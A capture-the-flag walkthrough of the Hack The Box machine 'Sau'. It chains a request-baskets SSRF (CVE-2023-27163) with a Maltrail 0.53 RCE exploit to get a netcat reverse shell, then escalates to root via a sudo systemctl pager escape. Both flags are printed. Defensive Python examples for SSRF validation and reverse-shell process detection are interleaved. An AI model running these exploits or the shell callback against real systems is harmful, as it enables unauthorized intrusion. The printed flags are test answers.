
HTB Sau done

Sau

OS:

Linux

Technology:

request-baskets 1.2.1
Maltrail v0.53

IP Address:

10.10.11.224

Open ports:

22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.224_nmap 10.10.11.224 ; cat 10.10.11.224_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-04 01:48 CEST
Nmap scan report for 10.10.11.224
Host is up (0.034s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sat, 03 Aug 2024 23:49:31 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sat, 03 Aug 2024 23:49:06 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sat, 03 Aug 2024 23:49:06 GMT
|_    Content-Length: 0

Exploit: SSRF on Request-Baskets (CVE-2023-27163)

[PoC of SSRF on Request-Baskets (CVE-2023-27163)](https://github.com/entr0pie/CVE-2023-27163/blob/main/CVE-2023-27163.sh)

Download exploit:

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh 
--2024-08-04 01:56:05--  https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1669 (1.6K) [text/plain]
Saving to: ‘CVE-2023-27163.sh’

CVE-2023-27163.sh             100%[==============================================>]   1.63K  --.-KB/s    in 0s      

2024-08-04 01:56:05 (8.87 MB/s) - ‘CVE-2023-27163.sh’ saved [1669/1669]

Run exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80 
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "dwkyxs" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/dwkyxs now makes the server request to http://127.0.0.1:80.
> Authorization: sqo80wPINNVtldYtgycBga2NssBm8efw8eu01jb7Sz0-

Open website: http://10.10.11.224:55555/dwkyxs

I found a web application called Maltrail, and its version is 0.53.
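The SSRF above works because request-baskets stores whatever forward_url the basket creator supplies and later fetches it server-side, so the loopback-only Maltrail instance on port 80 becomes reachable. As an added example (not code from this page or from the request-baskets project), a validator that a proxying feature could apply to a user-supplied forward URL before storing it; the blocked hostname list is a constructed policy, and the function name is an assumption.

```python
import ipaddress
from urllib.parse import urlsplit

# Names that resolve to the host itself; blocked by policy (constructed list).
BLOCKED_HOSTNAMES = {"localhost", "localhost.localdomain"}

def forward_url_is_safe(url: str) -> tuple[bool, str]:
    """Return (ok, reason) for a user-supplied forward URL.

    Policy: http(s) only, no userinfo, and an IP literal must be a public
    address. A hostname passes this static check only if it is not a known
    local alias; the resolved address must be re-checked at connect time,
    because DNS can later point the name at an internal IP.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable url"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host.lower().rstrip(".") in BLOCKED_HOSTNAMES:
        return False, "local hostname not allowed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: accept here, re-validate the resolved address later.
        return True, "hostname accepted (re-check resolved address at connect time)"
    # [::ffff:127.0.0.1] is still loopback; unwrap IPv4-mapped addresses first.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
        return False, f"non-public address {ip}"
    return True, "public address"
```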

Exploit: Maltrail-v0.53-RCE

[Maltrail-v0.53-RCE](https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ wget https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py
--2024-08-04 02:24:47--  https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1667 (1.6K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                    100%[==============================================>]   1.63K  --.-KB/s    in 0s      

2024-08-04 02:24:47 (7.80 MB/s) - ‘exploit.py’ saved [1667/1667]

Run exploit

* Create SSRF on Request-Baskets
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80      
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "hdswtj" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/hdswtj now makes the server request to http://127.0.0.1:80.
> Authorization: eMOdaY1Hum-fhhVSUWFA594vXutofLUmkfges9NYylX2
---
* Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.224] 37042
$ script /dev/null -c /bin/bash
script /dev/null -c /bin/bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ 
---
* Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ python exploit.py 10.10.14.9 443 http://10.10.11.224:55555/hdswtj  

Read flag: user.txt

puma@sau:/opt/maltrail$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/puma/user.txt


cd /home/pma/
cd /home/pma/
puma@sau:/opt/maltrail$ 
puma@sau:/opt/maltrail$ cd /home/pma/
bash: cd: /home/pma/: No such file or directory
puma@sau:/opt/maltrail$ cd /home/puma
cd /home/puma
puma@sau:~$ ls -la 
ls -la
total 32
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 .
drwxr-xr-x 3 root root 4096 Apr 15  2023 ..
lrwxrwxrwx 1 root root    9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r-- 1 puma puma  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 puma puma 3771 Feb 25  2020 .bashrc
drwx------ 2 puma puma 4096 Apr 15  2023 .cache
drwx------ 3 puma puma 4096 Apr 15  2023 .gnupg
-rw-r--r-- 1 puma puma  807 Feb 25  2020 .profile
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .viminfo -> /dev/null
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .wget-hsts -> /dev/null
-rw-r----- 1 root puma   33 Aug  3 22:40 user.txt
puma@sau:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
78231a4eef0bd8f8ddf3ae5bb43cba25
uid=1001(puma) gid=1001(puma) groups=1001(puma)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4e:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.224/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:4ed8/64 scope global dynamic mngtmpaddr 
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:fe94:4ed8/64 scope link 
       valid_lft forever preferred_lft forever
puma@sau:~$ 

Privilege Escalation

sudo

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$ 

GTFOBins - systemctl

https://gtfobins.github.io/gtfobins/systemctl/
---
puma@sau:~$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
     Active: active (running) since Sat 2024-08-03 22:40:42 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 892 (python3)
      Tasks: 24 (limit: 4662)
     Memory: 139.9M
     CGroup: /system.slice/trail.service
             ├─ 892 /usr/bin/python3 server.py
             ├─1390 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1391 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1396 sh
             ├─1401 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
             ├─1402 /bin/sh
             ├─1405 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1406 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1409 sh
             ├─1410 python3 -c import socket,subprocess,os;s=socket.socket(sock>
             ├─1411 sh
             ├─1414 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1415 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1418 sh
lines 1-23!sh
!sshh!sh
# 

# id
id
uid=0(root) gid=0(root) groups=0(root)
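The CGroup listing in the systemctl status output above shows what the Maltrail exploit looks like from the host: the server (PID 892) normally spawns `/bin/sh -c logger ...` helpers to record failed logins, but here those helpers have child shells and inline `python3 -c import socket...` processes. As an added example (not code from this page or from Maltrail), a check over a constructed `ps -eo pid,ppid,args` snapshot that flags exactly that pattern; the snapshot mirrors the listing above with command lines truncated as in the original, and the function names are assumptions.

```python
import re

# Constructed ps snapshot mirroring the trail.service CGroup listing; long
# command lines are truncated with "..." just as in the systemctl output.
PS_SNAPSHOT = """\
  PID  PPID COMMAND
    1     0 /sbin/init
  892     1 /usr/bin/python3 server.py
 1390   892 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p...
 1396  1390 sh
 1401  1396 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I...
 1402  1401 /bin/sh
 2001     1 /usr/sbin/sshd -D
 2002  2001 sshd: puma [priv]
 2010   892 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p...
"""

# Interpreter invoked with inline code (-c / -e) rather than a script file.
INLINE_CODE = re.compile(r"^(?:/usr/bin/)?(?:python3?|perl|ruby|php)\s+-[ce]\s")
NET_HINTS = ("socket", "pty", "/dev/tcp", "subprocess")
BARE_SHELLS = {"sh", "/bin/sh", "bash", "/bin/bash"}

def parse_ps(text):
    """Map pid -> (ppid, command line); the first line is the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        pid, ppid, cmd = line.split(None, 2)
        procs[int(pid)] = (int(ppid), cmd)
    return procs

def descendants(procs, root):
    """All pids below root in the process tree (any depth)."""
    out, stack = [], [root]
    while stack:
        parent = stack.pop()
        for pid, (ppid, _) in procs.items():
            if ppid == parent:
                out.append(pid)
                stack.append(pid)
    return out

def find_suspicious(procs, service_pid):
    """Flag processes under the service that a logging helper should never own."""
    findings = []
    for pid in descendants(procs, service_pid):
        ppid, cmd = procs[pid]
        parent_cmd = procs[ppid][1]
        if INLINE_CODE.match(cmd) and any(h in cmd for h in NET_HINTS):
            findings.append((pid, "inline interpreter with socket/pty code"))
        elif cmd.strip() in BARE_SHELLS and "logger" in parent_cmd:
            findings.append((pid, "bare shell spawned under a logger wrapper"))
    return sorted(findings)
```

The expected `sh -c logger` wrappers (1390, 2010) are not flagged; only their unexpected children are.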

Read flag: root.txt

# id
id
uid=0(root) gid=0(root) groups=0(root)
#    

# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------  6 root root 4096 Aug  4 00:37 .
drwxr-xr-x 20 root root 4096 Jun 19  2023 ..
lrwxrwxrwx  1 root root    9 Apr 15  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  3 root root 4096 Jun 19  2023 .cache
-rw-------  1 root root   31 Aug  4 00:37 .lesshst
drwxr-xr-x  3 root root 4096 Jun  8  2023 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 Apr 14  2023 .ssh
-rw-r--r--  1 root root   39 Jun  8  2023 .vimrc
lrwxrwxrwx  1 root root    9 Apr 15  2023 .wget-hsts -> /dev/null
drwxr-xr-x  4 root root 4096 Jun 19  2023 go
-rw-r-----  1 root root   33 Aug  3 22:40 root.txt
# cat root.txt; id ; ip a
cat root.txt; id ; ip a
b5eff1b70bb959e57be530cb273e1a31
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4e:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.224/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:4ed8/64 scope global dynamic mngtmpaddr 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:fe94:4ed8/64 scope link 
       valid_lft forever preferred_lft forever
# 

References

[PoC of SSRF on Request-Baskets (CVE-2023-27163)](https://github.com/entr0pie/CVE-2023-27163/blob/main/CVE-2023-27163.sh)
[Maltrail-v0.53-RCE](https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py)

Lessons Learned
